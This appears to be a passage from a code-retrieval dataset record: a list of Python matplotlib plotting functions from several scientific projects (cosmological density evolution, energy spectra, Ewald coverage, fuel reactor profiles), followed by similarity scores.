cfigure.show()\r\n \r\n #save plots\r\n if filename is not None:\r\n magfigure.savefig(filename+\".svg\")\r\n enfigure.savefig(filename+\"E.svg\")\r\n cfigure.savefig(filename+\"C.svg\")\r\n \r\n return(T, Ms, Cs)", "def magn_plot(names, values, data, model_key, plot_key=False):\n zpicks = data['zpicks']\n\n # Corrected absolute magnitude M of SN.\n M = values[0]\n\n dlpc, da, plot_var = zodesolve.zodesolve(names, values, zpicks, model_key, plot_key)\n\n # Calculating apparent magnitudes of supernovae at the simulated\n # luminosity distances using the distance modulus formula.\n mag = 5 * np.log10(dlpc/10) + M\n z = plot_var['z']\n if model_key == 'waterfall':\n plt.figure()\n plt.title(r'$\\bar \\Omega$ evolution in waterfall')\n plt.xlabel('redshift')\n plt.ylabel(r'$\\bar \\Omega$')\n plt.plot(z, plot_var['ombar_m'], label='ombar_m vs redshift')\n plt.plot(z, plot_var['ombar_r'], label='ombar_r vs redshift')\n plt.plot(z, plot_var['a_ombar'], label='a_ombar vs redshift')\n plt.plot(z, plot_var['b_ombar'], label='b_ombar vs redshift')\n plt.plot(z, plot_var['c_ombar'], label='c_ombar vs redshift')\n plt.plot(z, plot_var['ombar_de'], label='ombar_de vs redshift')\n plt.legend()\n\n sum_om = plot_var['ombar_m'] + plot_var['ombar_r'] + plot_var['a_ombar']+ plot_var['b_ombar'] + plot_var['c_ombar'] + plot_var['c_ombar'] +plot_var['ombar_de']\n om_m = plot_var['ombar_m']/sum_om\n om_r = plot_var['ombar_r']/sum_om\n om_a = plot_var['a_ombar']/sum_om\n om_b = 
plot_var['b_ombar']/sum_om\n om_c = plot_var['c_ombar']/sum_om\n om_de = plot_var['ombar_de']/sum_om\n\n plt.figure()\n plt.title(r'$\\Omega$ evolution in waterfall')\n plt.xlabel('redshift')\n plt.ylabel(r'$\\Omega$')\n plt.plot(z, om_m, label = 'om_m')\n plt.plot(z, om_r, label = 'om_r')\n plt.plot(z, om_a, label = 'om_a')\n plt.plot(z, om_b, label = 'om_b')\n plt.plot(z, om_c, label = 'om_c')\n plt.plot(z, om_de, label = 'om_de')\n plt.legend()\n plt.show()\n\n elif model_key == 'LCDM':\n plt.figure()\n plt.title(r'$\\bar \\Omega$ evolution in LCDM')\n plt.xlabel('redshift')\n plt.ylabel(r'$\\bar \\Omega$')\n plt.plot(z, plot_var['ombar_m'], label='ombar_m vs redshift')\n plt.plot(z, plot_var['ombar_de'], label='ombar_de vs redshift')\n plt.legend()\n\n sum_om = plot_var['ombar_m'] + plot_var['ombar_de']\n om_m = plot_var['ombar_m']/sum_om\n om_de = plot_var['ombar_de']/sum_om\n\n plt.figure()\n plt.title(r'$\\Omega$ evolution in LCDM')\n plt.xlabel('redshift')\n plt.ylabel(r'$\\Omega$')\n plt.plot(z, om_m, label = 'om_m')\n plt.plot(z, om_de, label = 'om_de')\n plt.legend()\n plt.show()\n\n elif model_key == 'exotic':\n plt.figure()\n plt.title(r'$\\bar \\Omega$ evolution in LCDM')\n plt.xlabel('redshift')\n plt.ylabel(r'$\\bar \\Omega$')\n plt.plot(z, plot_var['ombar_m'], label='ombar_m vs redshift')\n plt.plot(z, plot_var['ombar_r'], label='ombar_r vs redshift')\n plt.plot(z, plot_var['ombar_de'], label='ombar_de vs redshift')\n plt.legend()\n\n sum_om = plot_var['ombar_m'] + plot_var['ombar_r'] + plot_var['ombar_de']\n om_m = plot_var['ombar_m']/sum_om\n om_r = plot_var['ombar_r']/sum_om\n om_de = plot_var['ombar_de']/sum_om\n\n plt.figure()\n plt.title(r'$\\Omega$ evolution in LCDM')\n plt.xlabel('redshift')\n plt.ylabel(r'$\\Omega$')\n plt.plot(z, om_m, label = 'om_m')\n plt.plot(z, om_r, label = 'om_r')\n plt.plot(z, om_de, label = 'om_de')\n plt.legend()\n plt.show()\n\n if plot_key:\n # Plotting evolution of parameters in the model.\n import plots\n plots.modelcheck(mag, zpicks, plot_var, model_key)\n\n return mag", "def calculate_and_visualize_energy_spectrum(CV):\n E = 1 / (2 / np.pi)**2 * np.fft.fft2(CV) * 0.33 * 0.33\n # here the unit of CV is still the same as U and V (typically px/s), thus the unit of the correlation is px2/s2.\n # To convert the unit to um2/s2, multiply the correlation by mpp^2 (0.33^2 for 20x lens)\n k, K = corrLib.compute_wavenumber_field(E.shape, 25*0.33)\n\n ind = np.argsort(k.flatten())\n k_plot = k.flatten()[ind]\n E_plot = E.flatten()[ind]\n\n fig, ax = plt.subplots(nrows=1, ncols=2, dpi=300, figsize=(7, 3))\n ax[0].plot(k_plot, E_plot.real, lw=0.5, ls='--', alpha=0.5, label='real')\n ax[0].plot(k_plot, E_plot.imag, lw=0.5, ls='--', alpha=0.5, label='imag')\n ax[0].plot(k_plot, abs(E_plot), lw=0.5, label='abs') \n ax[0].legend()\n # ax[1].plot(k_plot, E_plot.real, lw=0.5, ls='--', alpha=0.5, label='real')\n # ax[1].plot(k_plot, E_plot.imag, lw=0.5, ls='--', alpha=0.5, label='imag')\n ax[1].plot(k_plot, abs(E_plot), lw=0.5, label='abs', color=bestcolor(2))\n ax[1].loglog()\n ax[1].legend()\n\n # guide of the eye slope\n x = np.array([0.01,0.03])\n y = x ** -1.3 * 2e1\n ax[1].plot(x, y, lw=0.5, ls='--', color='black')\n ax[1].text(x.mean(), 1.1*y.mean(), '-1.3')", "def plotImproperEnergy(self, phys, forces, step): \r\n self.plotQuantity(step, phys.app.energies.getTable(5), 'improperenergy')", "def plot_2d(self):\n fig = plt.figure(figsize=(10,8))\n \n d = int(len(self.a_scale.flat)**0.5)\n a_scale = self.a_scale.reshape(d,d)\n c_scale = 
self.c_scale.reshape(d,d)\n E_coh = self.E_coh.reshape(d,d)\n plt.pcolormesh(a_scale, c_scale, E_coh)\n plt.xlabel('xy linear deformation coefficient')\n plt.xlabel('z linear deformation coefficient')\n cbar = plt.colorbar()\n cbar.ax.set_ylabel('cohesive energy (eV/atom)',\n fontsize='x-large')\n plt.show()\n \n return fig", "def plot_ewald_coverage(energy_kev, color='k', linewidth=2):\n\n q_max = fc.calqmag(180, energy_kev)\n\n # calculate diffractometer angles\n angles = np.arange(0, 180, 0.1)\n Q1x, Q1y = fc.diffractometer_Q(angles, 180, energy_kev) # delta=180\n Q2x, Q2y = fc.diffractometer_Q(angles, angles, energy_kev) # eta=delta\n Q3x, Q3y = fc.diffractometer_Q(0, angles, energy_kev) # eta=0\n\n # Add diffractometer angles\n plt.plot(Q1x, Q1y, color, linewidth, label=r'2$\\theta$=180')\n plt.plot(Q2x, Q2y, color, linewidth, label=r'2$\\theta$=$\\theta$')\n plt.plot(Q3x, Q3y, color, linewidth, label=r'$\\theta$=0')\n plt.axis([-q_max, q_max, 0, q_max])", "def plot_1D_edp(self, start=(-10,25), end=(30,-20), N=100):\n rho = []\n x0, z0 = start\n x1, z1 = end\n xpoints = np.linspace(x0, x1, N)\n zpoints = np.linspace(z0, z1, N)\n for x, z in zip(xpoints, zpoints):\n tmp = self.phase * self.F * np.cos(self.qx*x+self.qz*z)\n dist = np.sqrt((x-x0)**2 + (z-z0)**2)\n rho.append([dist, tmp.sum(axis=0)])\n rho = np.array(rho, float)\n X = rho[:,0]\n Y = rho[:,1]\n plt.figure()\n plt.plot(X, Y)", "def results_plot_fuel_reactor(self):\n \n import matplotlib.pyplot as plt \n\n # Total pressure profile\n P = []\n for z in self.MB_fuel.z:\n P.append(value(self.MB_fuel.P[z]))\n fig_P = plt.figure(1)\n plt.plot(self.MB_fuel.z, P)\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"Total Pressure [bar]\") \n\n # Temperature profile\n Tg = []\n Ts = []\n# Tw = []\n for z in self.MB_fuel.z:\n Tg.append(value(self.MB_fuel.Tg[z] - 273.15))\n Ts.append(value(self.MB_fuel.Ts[z] - 273.15))\n# Tw.append(value(self.MB_fuel.Tw[z]))\n fig_T = plt.figure(2)\n plt.plot(self.MB_fuel.z, Tg, label='Tg')\n plt.plot(self.MB_fuel.z, Ts, label='Ts')\n# plt.plot(self.MB_fuel.z, Tw, label='Tw')\n plt.legend(loc=0,ncol=2)\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"Temperature [C]\") \n \n # Superficial gas velocity and minimum fluidization velocity\n vg = []\n umf = []\n for z in self.MB_fuel.z:\n vg.append(value(self.MB_fuel.vg[z]))\n umf.append(value(self.MB_fuel.umf[z]))\n fig_vg = plt.figure(3)\n plt.plot(self.MB_fuel.z, vg, label='vg')\n plt.plot(self.MB_fuel.z, umf, label='umf')\n plt.legend(loc=0,ncol=2)\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"Superficial gas velocity [m/s]\")\n \n # Gas components molar flow rate\n for j in self.MB_fuel.GasList:\n F = []\n for z in self.MB_fuel.z:\n F.append(value(self.MB_fuel.F[z,j]))\n fig_F = plt.figure(4)\n plt.plot(self.MB_fuel.z, F, label=j)\n plt.legend(loc=0,ncol=len(self.MB_fuel.GasList))\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"Gas component molar flow rate, F [mol/s]\") \n \n # Bulk gas phase total molar flow rate\n Ftotal = []\n for z in self.MB_fuel.z:\n Ftotal.append(value(self.MB_fuel.Ftotal[z]))\n fig_Ftotal = plt.figure(5)\n plt.plot(self.MB_fuel.z, Ftotal)\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"Total molar gas flow rate [mol/s]\") \n\n # Solid components mass flow rate\n for j in self.MB_fuel.SolidList:\n M = []\n for z in self.MB_fuel.z:\n M.append(value(self.MB_fuel.Solid_M[z,j]))\n fig_M = plt.figure(6)\n plt.plot(self.MB_fuel.z, M, label=j)\n 
plt.legend(loc=0,ncol=len(self.MB_fuel.SolidList))\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"Solid components mass flow rate [kg/s]\")\n \n # Bulk solid phase total molar flow rate\n Mtotal = []\n for z in self.MB_fuel.z:\n Mtotal.append(value(self.MB_fuel.Solid_M_total[z]))\n fig_Mtotal = plt.figure(7)\n plt.plot(self.MB_fuel.z, Mtotal)\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"Solid total mass flow rate [kg/s]\") \n \n # Gas phase concentrations\n for j in self.MB_fuel.GasList:\n Cg = []\n for z in self.MB_fuel.z:\n Cg.append(value(self.MB_fuel.Cg[z,j]))\n fig_Cg = plt.figure(8)\n plt.plot(self.MB_fuel.z, Cg, label=j)\n plt.legend(loc=0,ncol=len(self.MB_fuel.GasList))\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"Concentration [mol/m3]\") \n \n # Gas phase mole fractions\n for j in self.MB_fuel.GasList:\n y = []\n for z in self.MB_fuel.z:\n y.append(value(self.MB_fuel.y[z,j]))\n fig_y = plt.figure(9)\n plt.plot(self.MB_fuel.z, y, label=j)\n plt.legend(loc=0,ncol=len(self.MB_fuel.GasList))\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"y [-]\") \n \n # Solid phase mass fractions\n for j in self.MB_fuel.SolidList:\n x = []\n for z in self.MB_fuel.z:\n x.append(value(self.MB_fuel.x[z,j]))\n fig_x = plt.figure(10)\n plt.plot(self.MB_fuel.z, x, label=j)\n plt.legend(loc=0,ncol=len(self.MB_fuel.SolidList))\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"x [-]\") \n\n # Total mass fraction\n xtot = []\n for z in self.MB_fuel.z:\n xtot.append(value(self.MB_fuel.xtot[z]))\n fig_xtot = plt.figure(11)\n plt.plot(self.MB_fuel.z, xtot)\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"Total mass fraction [-]\") \n \n # # Gas mix density\n # rhog = []\n # for z in self.MB_fuel.z:\n # rhog.append(value(self.MB_fuel.rho_vap[z]))\n # fig_rhog = plt.figure(23)\n # plt.plot(self.MB_fuel.z, rhog)\n # plt.grid()\n # plt.xlabel(\"Bed height [-]\")\n # plt.ylabel(\"Gas mix density [kg/m3]\") \n \n # Fe conversion\n X_Fe = []\n for z in self.MB_fuel.z:\n X_Fe.append(value(self.MB_fuel.X[z])*100)\n fig_X_Fe = plt.figure(13)\n plt.plot(self.MB_fuel.z, X_Fe)\n plt.grid()\n plt.xlabel(\"Bed height [-]\")\n plt.ylabel(\"Fraction of metal oxide converted [%]\")" ]
[ "0.7072073", "0.6860298", "0.6784533", "0.6767711", "0.6717085", "0.64930975", "0.6264038", "0.62380916", "0.6227457", "0.62017035", "0.6190444", "0.61265624", "0.60596615", "0.6039065", "0.60338074", "0.59825134", "0.59809995", "0.5952686", "0.5921822", "0.5920559", "0.59139395", "0.5844829", "0.58424234", "0.58307946", "0.5811133", "0.5811126", "0.57887995", "0.5785455", "0.57846963", "0.5780625" ]
0.7414247
0
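The candidate documents gathered in the record above are all matplotlib plotting routines. As a minimal, self-contained sketch of the pattern they share (labelled series on an axes object, axis labels, legend, save), every array name below is a hypothetical stand-in rather than data taken from the record:

import numpy as np
import matplotlib.pyplot as plt

z = np.linspace(0.0, 2.0, 100)    # hypothetical independent variable
e = np.exp(-z)                    # hypothetical quantity to plot

fig, ax = plt.subplots()
ax.plot(z, e, label='energy')     # labelled series, as in the negatives above
ax.set_xlabel('z')
ax.set_ylabel('E')
ax.legend(loc='best')
ax.grid(True)
fig.savefig('energy_vs_z.png', dpi=300)   # hypothetical output name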
Returns the nth item
def nth(iterable, index):
    return next(itertools.islice(iterable, index, None))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def nth(n, seq):\n try:\n return seq[n]\n except TypeError:\n return next(itertools.islice(seq, n, None))", "def nth(iterable, n, default=None):\n return next(islice(iterable, n, None), default)", "def nth(iterable, n, default=None):\n return next(islice(iterable, n, None), default)", "def nth(iterable, n, default=None):\n return next(islice(iterable, n, None), default)", "def nth(_list, n):\n n = lloc(_list, n)\n return [a[n] for a in _list]", "def nth(n, iterable, default = None):\n return next(islice(iterable, n, None), default)", "def nth(iterable, n, next=next, islice=islice, default=None):\n return next(islice(iterable, n, None), default)", "def __getitem__(self, i):\n return self.get(i, i + 1)", "def __getitem__(self, n):\n return self._array[n]", "def getitem(s, i):\n while i > 0:\n s, i = rest(s), i - 1\n return first(s)", "def nth_element(iterable, n, first=0, last=None, key=None):\n assert hasattr(iterable, '__getitem__')\n last = last or len(iterable)\n pivot_idx = n\n pivot_idx = partition_with_pivot(iterable, pivot_idx, first=first, last=last, key=key)\n if n == pivot_idx:\n return\n elif n < pivot_idx:\n return nth_element(iterable, n, first, pivot_idx, key=key)\n else:\n return nth_element(iterable, n, pivot_idx+1, last, key=key)", "def __getitem__(self, index):\n ##if index == 0:\n ## return self.first\n ##else:\n ## return self.rest[index - 1]\n cur = self.first\n rest = self.rest\n while index != 0:\n cur, rest, index = rest.first, rest.rest, index - 1\n return cur", "def __getitem__(self,i):\n return self._items[i]", "def nth_element(input, n, reverse=False, name=None): # pylint: disable=redefined-builtin\n return gen_nn_ops.nth_element(input, n, reverse=reverse, name=name)", "def get_item(self,index):\n current = self.head\n count = 0\n \n while current != None and count <= index:\n count+=1\n current =current.get_next()\n \n if count!=index:\n print('Index out of bound')", "def __getitem__(self, i):\n\t\tif i < self.n:\n\t\t\treturn self.v[i]", "def take_nth(n):\n def _take_nth_xducer(step):\n outer = {\"idx\": 0}\n def _take_nth_step(r=Missing, x=Missing):\n if r is Missing: return step()\n if x is Missing:\n return step(r)\n if outer[\"idx\"] % n:\n outer[\"idx\"] += 1\n return r\n else:\n outer[\"idx\"] += 1\n return step(r, x)\n return _take_nth_step\n return _take_nth_xducer", "def get_info(index, n):\n return index/n, index%n", "def nth(f, *N):\n return dmp_ground_nth(f.rep, N, f.lev, f.dom)", "def __getitem__(self, n):\n if isinstance(n, slice):\n start, stop, step = n.start, n.stop, n.step\n if not start:\n start = 0\n if not stop:\n stop = len(self)\n if stop < 0:\n stop = len(self) + stop\n if start < 0:\n start = len(self) + start\n return self._fa.get_seq(self.name, start + 1, stop)[::step]\n\n elif isinstance(n, int):\n if n < 0:\n n = len(self) + n\n return self._fa.get_seq(self.name, n + 1, n + 1)", "def get(self, index):\n count = 0\n x = self.begin\n\n while count != index:\n x = x.next\n count += 1\n\n return x.value", "def everyotheritem(n):\n print(n[1::2])\n return(n[1::2])", "def get_by_index(self, index):\n if index > self.length - 1:\n return None\n else:\n return self.items[index]", "def __getitem__(self, index):\n if self.is_empty():\n raise IndexError\n elif index == 0:\n return self._first\n else:\n return self._rest.__getitem__(index - 1)\n # Equivalently, return self._rest[index - 1]", "def get_item(self, index: int) -> _T:\n return self.index_to_item[index]", "def index(item, i):\n try:\n return item[i]\n except IndexError:\n return 
\"\"", "def __getitem__(self, index: int) -> Any:\n # If empty raise indexerror\n if self.is_empty():\n raise IndexError\n # Set the _first item\n elif index == 0:\n return self._first\n # Recurse on _rest\n else:\n return self._rest[index - 1]", "def getitem_link(s, i):\n while i > 0:\n s, i = rest(s), i - 1\n return first(s)", "def getitem_link(s, i):\n while i > 0:\n s, i = rest(s), i - 1\n return first(s)", "def __getitem__(self, index):\r\n return self._items[index]" ]
[ "0.7396352", "0.72852194", "0.72852194", "0.72852194", "0.7229926", "0.7180901", "0.70936525", "0.69702876", "0.6887761", "0.6603851", "0.6541124", "0.6488166", "0.6476991", "0.64401025", "0.64200073", "0.6405436", "0.63758516", "0.6363515", "0.63572127", "0.62999797", "0.6292197", "0.62667274", "0.623331", "0.62273806", "0.6226873", "0.6156516", "0.6134329", "0.6122636", "0.6122636", "0.6105235" ]
0.7512134
0
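A usage sketch for the nth() document above. The record omits the itertools import, so it is added here; unlike the nth(iterable, n, default=None) variants among the negatives, this version raises StopIteration when the index runs past the end of the iterable.

import itertools

def nth(iterable, index):
    return next(itertools.islice(iterable, index, None))

print(nth(range(10), 3))             # 3
print(nth((c for c in 'abc'), 1))    # b
# nth(range(3), 7) would raise StopIteration, since no default is supplied.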
Store any type of data in Redis
def store(self, data: Union[str, bytes, int, float]) -> str:
    k = str(uuid.uuid4())
    self._redis[k] = data
    return k
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def store(self, data: Union[str, bytes, int, float]) -> str:\n key = str(uuid.uuid4())\n self._redis.set(key, data)\n return key", "def redis_save(key: object, value: object) -> object:\n if key is not None and value is not None:\n red.redis.set(json.dumps(key), json.dumps(value))", "def publish_data(data):\n redis_db.publish(DATA_CHANNEL, json.dumps(data))", "def put(data):", "def store(self,key,start,end,data):\n\n pass", "def store(self, key, value):\n pass", "def buffer(self, entry):\n # TODO\n print(\"Storing {} in Redis.\".format(entry))\n\n # Redis list to store all ids of entities\n self._pipeline.rpush(\n self._list_name,\n '{}'.format(entry.id)\n )\n\n # Redis hash to store all attributes of entities\n hash_name = '{}:{}'.format(self._list_name, entry.id)\n hash_dict = {}\n field_names = list(entry.__all__)\n field_names.remove('id')\n for field_name in field_names:\n hash_dict[field_name] = getattr(entry, field_name)\n\n self._pipeline.hmset(hash_name, hash_dict)", "def to_redis(self, value, **kwargs):\n return self.to_python(value)", "def store(self, key, headers, value):", "def _put(self, key: bytes, value: bytes, expire_time_ms: int=None):\n self.db.put(key, pickle.dumps((value, expire_time_ms)))", "def set_to_db(key, str_value):\n redis_db.set(KEY_PREFIX + key, str_value)", "def put(self,data):\n\n \n try:\n\n db = getDatabase()\n connection = db.connect()\n \n connection.put(self,data)\n except Exception as e:\n raise e\n finally:\n db.dispose()", "def store(con,command,key,value,flags=0,exptime=0):\n # yy=atpic.log.setname(xx,'store')\n if isinstance(value,int):\n value=\"{0}\".format(value)\n \n commandb=command.encode('utf-8')\n keyb=key.encode('utf-8')\n valueb=value.encode('utf-8')\n bytesnb=len(valueb)\n thecommand=\"{command} {key} {flags} {exptime} {bytes}\\r\\n{value}\\r\\n\".format(command=command,key=key,flags=flags,exptime=exptime,bytes=bytesnb,value=value) \n # atpic.log.debug(yy,'thecommand --->',thecommand,'<---')\n con.send(thecommand.encode('utf-8'))\n response=get_line(con)\n # atpic.log.debug(yy,'response',response)\n return response", "def WriteDataToRedisList(ListName,data):\n redispool = redis.ConnectionPool(host=RedisIP,port=RedisPort,db=RedisDB)\n redata = redis.Redis(connection_pool=redispool)\n redata.lpush(ListName,data)", "def store_search_value(\n self, search_id: Hashable, key: Hashable, value: Any\n ) -> None:\n key = f\"{search_id}.{key}\"\n value = pickle.dumps(value)\n self._redis.set(key, value)", "async def put(self, key, data):\n data = self.convert_object_to_timestamp(data)\n await self.client.set(key, json.dumps(data))", "def callback_object(self, data):\n\n try:\n # TODO support multiple of the same object\n # Save an array of object locations\n self.redis.set(self.prefix+\"_\"+data.name, json.dumps([{\n \"name\": data.name,\n \"time\": data.time,\n \"x\": data.x,\n \"y\": data.y,\n \"z\": data.z\n }]))\n except:\n rospy.logerr(\"Cannot insert row\")", "def store(self, args):\n pass", "def store_data(self, data):\n self.data.append(data)", "def store(bank, key, data):\n c_key = f\"{bank}/{key}\"\n tstamp_key = f\"{bank}/{key}{_tstamp_suffix}\"\n\n try:\n c_data = salt.payload.dumps(data)\n api.kv.put(c_key, c_data)\n api.kv.put(tstamp_key, salt.payload.dumps(int(time.time())))\n except Exception as exc: # pylint: disable=broad-except\n raise SaltCacheError(f\"There was an error writing the key, {c_key}: {exc}\")", "def _put(self, key, data):\n path = self._get_key_path(key)\n with open(path, \"wb\") as pickle_file:\n 
pickle.dump(data, pickle_file)", "def set_many(self, data, timeout=None):\n try:\n safe_data = {}\n for key, value in data.iteritems():\n safe_data[self.prepare_key(key)] = pickle.dumps(value)\n if safe_data:\n self._cache.mset(safe_data)\n map(self.expire, safe_data, [timeout]*len(safe_data))\n except Exception as err:\n return self.warn_or_error(err)", "def populate_redis(self, d):\n for k, v in d.items():\n self.redis_conn.set(k, v)", "def set_to_redis(self, key: str, value):\n self.redis_client.hset(self.root_path, key, value)", "async def _set(self, key, value, ttl=0):\n value = str.encode(value) if isinstance(value, str) else value\n return await self.client.set(key, value, exptime=ttl or 0)", "def store_stream(data: DataStream):\n if data:\n try:\n c1 = datetime.now()\n CC.save_datastream(data,\"datastream\")\n e1 = datetime.now()\n CC.save_datastream_to_influxdb(data)\n i1 = datetime.now()\n print(\"Cassandra Time: \", e1-c1, \" Influx Time: \",i1-e1, \" Batch size: \",len(data.data))\n except:\n cc_log()", "def write(self, record):\n if not record:\n return\n\n # Convert to a dict - inefficient, I know...\n if type(record) is DASRecord:\n record = json.loads(record.as_json())\n if type(record) is dict:\n # If our local queue is full, throw away the oldest entries\n while self.send_queue.full():\n try:\n logging.debug('CachedDataWriter queue full - dropping oldest...')\n self.send_queue.get_nowait()\n except asyncio.QueueEmpty:\n logging.warning('CachedDataWriter queue is both full and empty?!?')\n\n # Enqueue our latest record for send\n self.send_queue.put_nowait(record)\n else:\n logging.warning('CachedDataWriter got non-dict/DASRecord object of '\n 'type %s: %s', type(record), str(record))", "def publish_metric(name, value, type):\n t = time.time()\n m = json.dumps({'monitor':name, type:value, 'time':t})\n r = redis.StrictRedis(host='localhost', port=6379, db=0) \n r.lpush('sensor_readings',m)", "def save_data(self):\n data = self.data\n if data is not None:\n data = base64.encodestring(pickle.dumps(data))\n connection = self._open_db()\n cursor = connection.cursor()\n cursor.execute('UPDATE sessions SET data = ? WHERE id = ?;',\n (data, self.sid))\n cursor.close()\n connection.commit()\n connection.close()", "def save_data(db, dict_key, url, data_to_store):\n if dict_key not in db:\n db[dict_key] = []\n data = db[dict_key]\n data.append({\n 'url': url,\n 'data': data_to_store,\n })\n db[dict_key] = data" ]
[ "0.74398786", "0.7203963", "0.68926376", "0.64535683", "0.6436974", "0.6225524", "0.61990386", "0.61871934", "0.61752015", "0.6131745", "0.6131207", "0.6122489", "0.6113348", "0.6100349", "0.6039475", "0.5939632", "0.59025615", "0.5878599", "0.58582723", "0.5839085", "0.5830305", "0.5815717", "0.5813621", "0.5793122", "0.5788811", "0.57814974", "0.57733136", "0.5765889", "0.5763404", "0.5762745" ]
0.7362231
1
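A hedged sketch of the class the store() method above would live in: only the method appears in the record, so the Cache name and the __init__ body are assumptions. The record's dict-style self._redis[k] = data works with redis-py clients that support item assignment; the sketch uses the explicit set() call spelled out in the first negative.

import uuid
from typing import Union

import redis   # assumed client library; the record shows only the method

class Cache:                        # class name is an assumption
    def __init__(self) -> None:
        self._redis = redis.Redis()

    def store(self, data: Union[str, bytes, int, float]) -> str:
        key = str(uuid.uuid4())     # random key, as in the record
        self._redis.set(key, data)  # explicit set(), as in the first negative
        return key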
Iterate through supported mode/char combinations.
def iter_mode(n, obj='ndarray'):
    for mode in cap[obj][MODE]:
        for char in fmtdict[mode]:
            yield randitems(n, obj, mode, char)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __iter__(self):\n return iter([v for k, v in sorted(self._modes.items())])", "def modes(self):\n try:\n order = self._current_order\n except AttributeError:\n raise AttributeError('Cannot iterate over modes without iterating over orders!') from None\n mode = -order\n while mode <= order:\n yield mode\n mode += 1", "def get_modes(self, code_block):\r\n # FUCK YOU INDEX ERRORS, LIST COMPS, AND EVEN YOU LAMBDAS I DON'T NEED PRETTY\r\n # 0 = pos mode\r\n # 1 = imm mode\r\n modes, mode_codes = [0, 0], list(reversed(str(code_block[0])))[2:]\r\n x = 0\r\n for mode in mode_codes:\r\n modes[x] = int(mode)\r\n x += 1\r\n print('Get modes: ')\r\n print(modes)\r\n return modes", "def _get_applicable_modes(command):\n mode_dict = {}\n _add_applicable_modes(command, mode_dict)\n return mode_dict.keys()", "def supported_modes(self) -> Set[str]:\n raise NotImplementedError", "def _get_modes(self):\n return self.__modes", "def _read_characters(self):\n\n # Read the character information table\n for c in range(self.smallest_character_code, self.largest_character_code + 1):\n self._process_char(c)", "def test_support_CHANMODES(self):\n self._testFeatureDefault(\"CHANMODES\")\n self._testFeatureDefault(\"CHANMODES\", [(\"CHANMODES\", \"b,,lk,\")])\n self._testFeatureDefault(\"CHANMODES\", [(\"CHANMODES\", \"b,,lk,ha,ha\")])\n\n self.assertEqual(\n self._parseFeature(\"CHANMODES\", \",,,\"),\n {\"addressModes\": \"\", \"param\": \"\", \"setParam\": \"\", \"noParam\": \"\"},\n )\n\n self.assertEqual(\n self._parseFeature(\"CHANMODES\", \",A,,\"),\n {\"addressModes\": \"\", \"param\": \"A\", \"setParam\": \"\", \"noParam\": \"\"},\n )\n\n self.assertEqual(\n self._parseFeature(\"CHANMODES\", \"A,Bc,Def,Ghij\"),\n {\"addressModes\": \"A\", \"param\": \"Bc\", \"setParam\": \"Def\", \"noParam\": \"Ghij\"},\n )", "def test_modes_for_course_multiple(self):\r\n mode1 = Mode(u'honor', u'Honor Code Certificate', 0, '', 'usd', None)\r\n mode2 = Mode(u'verified', u'Verified Certificate', 0, '', 'usd', None)\r\n set_modes = [mode1, mode2]\r\n for mode in set_modes:\r\n self.create_mode(mode.slug, mode.name, mode.min_price, mode.suggested_prices)\r\n\r\n modes = CourseMode.modes_for_course(self.course_key)\r\n self.assertEqual(modes, set_modes)\r\n self.assertEqual(mode1, CourseMode.mode_for_course(self.course_key, u'honor'))\r\n self.assertEqual(mode2, CourseMode.mode_for_course(self.course_key, u'verified'))\r\n self.assertIsNone(CourseMode.mode_for_course(self.course_key, 'DNE'))", "def test_multiple_modes(self, parse_input_mocked_metadata, modes):\n bb = parse_input_mocked_metadata(\"Vac | {}\\n\".format(modes))\n assert bb.operations == [{\"modes\": [0, 1, 2, 5], \"op\": \"Vac\"}]", "def modes(self) -> List[str]:\n return [m.name for m in self._modes]", "def supported_operation_modes(\n self,\n ) -> list[HVACModeT]:", "def getModes(this):\n\t\tthis.checkInit()\n\t\t\n\t\t# On sauvegarde la config actuelle\n\t\tinit = this.config(get=True)\n\t\t\n\t\t# Ensembles de modes\n\t\tformats = Camera.formats.copy()\n\t\tmodes = set()\n\t\t\n\t\t# On averti du départ\n\t\tprint '\\nLooping modes for the camera... 
(%d modes)' % (len(formats))\n\t\t\t\n\t\t# Pour chaques formats\n\t\twhile formats:\n\t\t\t\n\t\t\t# On récupère le format à tester\n\t\t\tformat = formats.pop()\n\t\t\t\n\t\t\t# Configuration actuelle\n\t\t\tmode = this.config(\n\t\t\t\theight = float(format[1]),\n\t\t\t\twidth = float(format[0])\n\t\t\t)\n\t\t\t\n\t\t\t# On enregistre le mode\n\t\t\tcurrentFormat = (mode['width'], mode['height'])\n\t\t\tmodes.add(currentFormat)\n\t\t\tif currentFormat in formats:\n\t\t\t\tformats.remove(currentFormat)\n\t\t\t\n\t\t\t# On affiche l'itération courante\n\t\t\tprintf('%d%5s\\r' % (len(formats), ''))\n\t\t###\n\t\t\n\t\t# On remet comme avant et on retourne la liste de modes\n\t\tthis.config(params=init); print 'Done, found %d.' % (len(modes))\n\t\treturn [(int(mode[0]), int(mode[1])) for mode in modes]", "def get_modes(self):\n return self.circuit.get_modes()", "def modes(self):\n return np.hstack(tuple(self.operator.modes))", "def _modes(self):\n answer = []\n for i in dir(self):\n if i.startswith('handle_'):\n answer.append(i.replace('handle_', ''))\n return answer", "def get_modes(self):\n modes = set()\n for er in self.exercise_recordings:\n if er.mode not in modes:\n modes.add(er.mode)\n return list(modes)", "def get_modes(self):\n return [i for i, j in enumerate(self._modemap._map) if j is not None]", "def init_modes(self):\n \n self.deleteMode = delete_Mode()\n self.commandMode = command_Mode()\n self.visualMode = visual_Mode()\n self.insertMode = insert_Mode()\n self.exMode = ex_Mode()\n self.yankMode = yank_Mode()\n self.gmodeMode = gmode_Mode()\n self.cmodeMode = cmode_Mode()\n self.rmodeMode = rmode_Mode()\n self.tmodeMode = 